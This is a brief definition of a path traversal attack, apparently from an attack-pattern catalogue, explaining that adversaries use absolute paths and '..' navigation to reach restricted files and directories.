An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as ".." to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.